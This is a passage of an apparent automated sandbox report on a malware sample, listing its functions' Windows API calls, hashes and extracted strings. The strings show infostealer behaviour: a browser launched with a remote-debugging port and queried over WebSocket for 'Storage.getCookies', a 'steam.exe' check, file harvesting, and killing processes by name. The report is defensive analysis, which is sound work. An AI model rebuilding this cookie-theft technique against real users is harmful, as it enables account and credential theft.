                                    • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$Process32lstrcat$Close$HandleNextProcessstrlen$CreateDesktopOpenmemset$FirstSnapshotTerminateToolhelp32wsprintf$FolderPathSleepSystemTimelstrcpynlstrlen
                                    • String ID: --remote-debugging-port=9229 --profile-directory="$%s%s$D
                                    • API String ID: 958055206-1862457068
                                    • Opcode ID: 56efd6e9e528c3eb5233f4fba2945757e7e95b3c4b9c5d6119afa4bb9136fcf8
                                    • Instruction ID: 0f87957bd08ee314cf2fe28ae49fe6d95f5908669f67c755f41dc594853dc392
                                    • Opcode Fuzzy Hash: 56efd6e9e528c3eb5233f4fba2945757e7e95b3c4b9c5d6119afa4bb9136fcf8
                                    • Instruction Fuzzy Hash: 9F919471900208ABDB64EFB4DC45FDE77B8EF48700F1440A9F619A7185DBB4AA84DBA0
                                    Function 00F7E210 Relevance: 38.7, APIs: 20, Strings: 2, Instructions: 212stringfileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • wsprintfA.USER32 ref: 00F7E22C
                                    • FindFirstFileA.KERNEL32(?,?), ref: 00F7E243
                                    • StrCmpCA.SHLWAPI(?,00F917A0), ref: 00F7E263
                                    • StrCmpCA.SHLWAPI(?,00F917A4), ref: 00F7E27D
                                    • wsprintfA.USER32 ref: 00F7E2A2
                                    • StrCmpCA.SHLWAPI(?,00F8CFEC), ref: 00F7E2B4
                                    • wsprintfA.USER32 ref: 00F7E2D1
                                      • Part of subcall function 00F7EDE0: lstrcpy.KERNEL32(00000000,?), ref: 00F7EE12
                                    • wsprintfA.USER32 ref: 00F7E2F0
                                    • PathMatchSpecA.SHLWAPI(?,?), ref: 00F7E304
                                    • lstrcat.KERNEL32(?,00A9E978), ref: 00F7E335
                                    • lstrcat.KERNEL32(?,00F91794), ref: 00F7E347
                                    • lstrcat.KERNEL32(?,?), ref: 00F7E358
                                    • lstrcat.KERNEL32(?,00F91794), ref: 00F7E36A
                                    • lstrcat.KERNEL32(?,?), ref: 00F7E37E
                                    • CopyFileA.KERNEL32(?,?,00000001), ref: 00F7E394
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F7E3D2
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F7E422
                                    • DeleteFileA.KERNEL32(?), ref: 00F7E45C
                                      • Part of subcall function 00F61530: lstrcpy.KERNEL32(00000000,?), ref: 00F61557
                                      • Part of subcall function 00F61530: lstrcpy.KERNEL32(00000000,?), ref: 00F61579
                                      • Part of subcall function 00F61530: lstrcpy.KERNEL32(00000000,?), ref: 00F6159B
                                      • Part of subcall function 00F61530: lstrcpy.KERNEL32(00000000,?), ref: 00F615FF
                                    • FindNextFileA.KERNEL32(00000000,?), ref: 00F7E49B
                                    • FindClose.KERNEL32(00000000), ref: 00F7E4AA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$Filewsprintf$Find$CloseCopyDeleteFirstMatchNextPathSpec
                                    • String ID: %s\%s$%s\*
                                    • API String ID: 1375681507-2848263008
                                    • Opcode ID: d4394fa65fc7966a404daa887cce15e0347163adb3fe9b427aed05dac811443a
                                    • Instruction ID: 1838a093b9f26c4147a5f6f6648d4199e2bc28f47085d7cd83c5fc612305d96c
                                    • Opcode Fuzzy Hash: d4394fa65fc7966a404daa887cce15e0347163adb3fe9b427aed05dac811443a
                                    • Instruction Fuzzy Hash: A7819371D0021D9BCB24EFA4DD49EEE7778BF48304F0485A9B52A93141EB35EA84DFA1
                                    Function 00F616B9 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 219stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F616E2
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F61719
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F6176C
                                    • lstrcat.KERNEL32(00000000), ref: 00F61776
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F617A2
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F618F3
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F618FE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat
                                    • String ID: \*.*
                                    • API String ID: 2276651480-1173974218
                                    • Opcode ID: f350945ec51637b3fbfd708ca5855debb073e47359fa4dd3622a21e130b311ac
                                    • Instruction ID: 4f3bcbcc091c90b18e8ead81efe035be9b4be94dea8a3b3689c8f326ed93e55b
                                    • Opcode Fuzzy Hash: f350945ec51637b3fbfd708ca5855debb073e47359fa4dd3622a21e130b311ac
                                    • Instruction Fuzzy Hash: 1781AF31D1160A9BCB21EFA8DD99AAE77B8BF44314F0C0128F815A7245CB38DC41FBA1
                                    Function 00F7DD30 Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 171stringfilememoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00F7DD45
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00F7DD4C
                                    • wsprintfA.USER32 ref: 00F7DD62
                                    • FindFirstFileA.KERNEL32(?,?), ref: 00F7DD79
                                    • StrCmpCA.SHLWAPI(?,00F917A0), ref: 00F7DD9C
                                    • StrCmpCA.SHLWAPI(?,00F917A4), ref: 00F7DDB6
                                    • wsprintfA.USER32 ref: 00F7DDD4
                                    • DeleteFileA.KERNEL32(?), ref: 00F7DE20
                                    • CopyFileA.KERNEL32(?,?,00000001), ref: 00F7DDED
                                      • Part of subcall function 00F61530: lstrcpy.KERNEL32(00000000,?), ref: 00F61557
                                      • Part of subcall function 00F61530: lstrcpy.KERNEL32(00000000,?), ref: 00F61579
                                      • Part of subcall function 00F61530: lstrcpy.KERNEL32(00000000,?), ref: 00F6159B
                                      • Part of subcall function 00F61530: lstrcpy.KERNEL32(00000000,?), ref: 00F615FF
                                      • Part of subcall function 00F7D980: memset.MSVCRT ref: 00F7D9A1
                                      • Part of subcall function 00F7D980: memset.MSVCRT ref: 00F7D9B3
                                      • Part of subcall function 00F7D980: SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 00F7D9DB
                                      • Part of subcall function 00F7D980: lstrcpy.KERNEL32(00000000,?), ref: 00F7DA0E
                                      • Part of subcall function 00F7D980: lstrcat.KERNEL32(?,00000000), ref: 00F7DA1C
                                      • Part of subcall function 00F7D980: lstrcat.KERNEL32(?,00A9E490), ref: 00F7DA36
                                      • Part of subcall function 00F7D980: lstrcat.KERNEL32(?,?), ref: 00F7DA4A
                                      • Part of subcall function 00F7D980: lstrcat.KERNEL32(?,00A9CFF8), ref: 00F7DA5E
                                      • Part of subcall function 00F7D980: lstrcpy.KERNEL32(00000000,?), ref: 00F7DA8E
                                      • Part of subcall function 00F7D980: GetFileAttributesA.KERNEL32(00000000), ref: 00F7DA95
                                    • FindNextFileA.KERNEL32(00000000,?), ref: 00F7DE2E
                                    • FindClose.KERNEL32(00000000), ref: 00F7DE3D
                                    • lstrcat.KERNEL32(?,00A9E978), ref: 00F7DE66
                                    • lstrcat.KERNEL32(?,00A9DDF0), ref: 00F7DE7A
                                    • lstrlen.KERNEL32(?), ref: 00F7DE84
                                    • lstrlen.KERNEL32(?), ref: 00F7DE92
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F7DED2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$File$Find$Heaplstrlenmemsetwsprintf$AllocateAttributesCloseCopyDeleteFirstFolderNextPathProcess
                                    • String ID: %s\%s$%s\*
                                    • API String ID: 4184593125-2848263008
                                    • Opcode ID: 2e608d8194acf0baf37f6d069a53401dee5db73e7302351edede77c70b91e9af
                                    • Instruction ID: 1de17d00b3ccb5d36a632b88f3ef8b77fc74e8ccec3c77b169a5e41fad699f12
                                    • Opcode Fuzzy Hash: 2e608d8194acf0baf37f6d069a53401dee5db73e7302351edede77c70b91e9af
                                    • Instruction Fuzzy Hash: 9D619571910208ABCB24EFB4DD49AEE77B9BF48310F0445A9F529D7244EB38AE84DF51
                                    Function 00F7D530 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 183stringfileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • wsprintfA.USER32 ref: 00F7D54D
                                    • FindFirstFileA.KERNEL32(?,?), ref: 00F7D564
                                    • StrCmpCA.SHLWAPI(?,00F917A0), ref: 00F7D584
                                    • StrCmpCA.SHLWAPI(?,00F917A4), ref: 00F7D59E
                                    • lstrcat.KERNEL32(?,00A9E978), ref: 00F7D5E3
                                    • lstrcat.KERNEL32(?,00A9E8B8), ref: 00F7D5F7
                                    • lstrcat.KERNEL32(?,?), ref: 00F7D60B
                                    • lstrcat.KERNEL32(?,?), ref: 00F7D61C
                                    • lstrcat.KERNEL32(?,00F91794), ref: 00F7D62E
                                    • lstrcat.KERNEL32(?,?), ref: 00F7D642
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F7D682
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F7D6D2
                                    • FindNextFileA.KERNEL32(00000000,?), ref: 00F7D737
                                    • FindClose.KERNEL32(00000000), ref: 00F7D746
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$Find$Filelstrcpy$CloseFirstNextwsprintf
                                    • String ID: %s\%s
                                    • API String ID: 50252434-4073750446
                                    • Opcode ID: 5b5963648e703efbfd17bf216443b2a4a7977cf14e73b66652daba3d9faccb2a
                                    • Instruction ID: 346b4500dec5d58a55a3c41d51850e6e5ba2b6345e36eee7965f64ae3521bb15
                                    • Opcode Fuzzy Hash: 5b5963648e703efbfd17bf216443b2a4a7977cf14e73b66652daba3d9faccb2a
                                    • Instruction Fuzzy Hash: 61618671D101199BCF24EFB4DC84ADE77B8BF48314F0485A9E56993240DB34AA85DF91
                                    Function 00F848B0 Relevance: 16.1, APIs: 4, Strings: 6, Instructions: 1129COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Xinvalid_argumentstd::_
                                    • String ID: Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: $Sec-WebSocket-Version: 13$ HTTP/1.1Host: $:$ws://${"id":1,"method":"Storage.getCookies"}
                                    • API String ID: 909987262-758292691
                                    • Opcode ID: 58550b661bc6c713aef0d0e8be65b92252c0aa342fe3393ebabfecbca6112430
                                    • Instruction ID: 61df9b21c778c320854e3fc5dd05f1b97c6598cfa01cdc4b97c1e07fb81fd456
                                    • Opcode Fuzzy Hash: 58550b661bc6c713aef0d0e8be65b92252c0aa342fe3393ebabfecbca6112430
                                    • Instruction Fuzzy Hash: D0A27871D012699FDF20DFA8C8907EDBBB6BF48310F1481AAD518A7241DB746E85EF90
                                    Function 00F723A9 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 106stringfileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F723D4
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F723F7
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F72402
                                    • lstrlen.KERNEL32(\*.*), ref: 00F7240D
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F7242A
                                    • lstrcat.KERNEL32(00000000,\*.*), ref: 00F72436
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F7246A
                                    • FindFirstFileA.KERNEL32(00000000,?), ref: 00F72486
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                    • String ID: \*.*
                                    • API String ID: 2567437900-1173974218
                                    • Opcode ID: e8ce03df8c63a1484b2e43acddcd2b73cd4b3e77594b3805d7ebd19ca7b4e034
                                    • Instruction ID: af7f00c8610e404b08a4f064da3da1d257c804af713b8a1d466a49b19463c333
                                    • Opcode Fuzzy Hash: e8ce03df8c63a1484b2e43acddcd2b73cd4b3e77594b3805d7ebd19ca7b4e034
                                    • Instruction Fuzzy Hash: 64419330512A098BCBB2EFA4DD85A9E73B4BF54314F085139F86A97212CB78DC41BB91
                                    Function 00F846A0 Relevance: 13.6, APIs: 9, Instructions: 54processCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00F846B9
                                    • Process32First.KERNEL32(00000000,00000128), ref: 00F846C9
                                    • Process32Next.KERNEL32(00000000,00000128), ref: 00F846DB
                                    • StrCmpCA.SHLWAPI(?,?), ref: 00F846ED
                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00F84702
                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 00F84711
                                    • CloseHandle.KERNEL32(00000000), ref: 00F84718
                                    • Process32Next.KERNEL32(00000000,00000128), ref: 00F84726
                                    • CloseHandle.KERNEL32(00000000), ref: 00F84731
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                                    • String ID:
                                    • API String ID: 3836391474-0
                                    • Opcode ID: 5609e76f322dfd70c34efc91098d36ffa61c64ca092f75befcf7c2a26e9e4669
                                    • Instruction ID: f6c9adcf7da8264b6c11d4c1fa2329a237222ec22ee12d134221239829fa51e4
                                    • Opcode Fuzzy Hash: 5609e76f322dfd70c34efc91098d36ffa61c64ca092f75befcf7c2a26e9e4669
                                    • Instruction Fuzzy Hash: 2A01C4319012196BE7346B60DC8DFFE777CEB4AB15F0400A8FA25D1084EF74A9C09B61
                                    Function 00F84610 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 45processCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000), ref: 00F84628
                                    • Process32First.KERNEL32(00000000,00000128), ref: 00F84638
                                    • Process32Next.KERNEL32(00000000,00000128), ref: 00F8464A
                                    • StrCmpCA.SHLWAPI(?,steam.exe), ref: 00F84660
                                    • Process32Next.KERNEL32(00000000,00000128), ref: 00F84672
                                    • CloseHandle.KERNEL32(00000000), ref: 00F8467D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
